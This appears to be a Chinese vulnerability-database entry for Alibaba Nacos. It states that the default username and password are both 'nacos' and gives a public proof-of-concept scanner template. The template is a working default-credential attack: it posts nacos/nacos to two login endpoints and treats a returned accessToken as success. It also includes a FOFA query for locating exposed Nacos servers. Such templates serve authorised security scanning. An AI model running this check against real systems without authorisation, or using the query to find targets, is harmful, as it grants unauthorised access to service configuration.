漏洞描述
The default username and password for Nacos are both nacos.
nacos-default-login: Alibaba Nacos - Default Login
PoC代码[已公开]
id: nacos-default-login
info:
name: Alibaba Nacos - Default Login
author: SleepingBag945
severity: high
description: |
The default username and password for Nacos are both nacos.
classification:
cpe: cpe:2.3:a:alibaba:nacos:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
vendor: alibaba
product: nacos
fofa-query: title=="Nacos"
tags: nacos,default-login,alibaba,vuln
http:
- raw:
- |
POST /v1/auth/users/login HTTP/1.1
Host: {{Hostname}}
User-Agent: Nacos-Server
Content-Type: application/x-www-form-urlencoded
username={{username}}&password={{password}}
- |
POST /nacos/v1/auth/users/login HTTP/1.1
Host: {{Hostname}}
User-Agent: Nacos-Server
Content-Type: application/x-www-form-urlencoded
username={{username}}&password={{password}}
attack: pitchfork
payloads:
username:
- nacos
password:
- nacos
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"accessToken":'
- '"username":'
condition: and
- type: word
part: header
words:
- 'application/json'
- type: status
status:
- 200
# digest: 490a004630440220662ec8fc8113d2b6fd41aca71d78b7be142b0dabf7c4ea4f040263d24f8e4d290220759a447b3e47b230eecbd60df50cb5adc44fdb4ebe30e93d539317879b317dd3:922c64590222798bb761d5b6d8e72950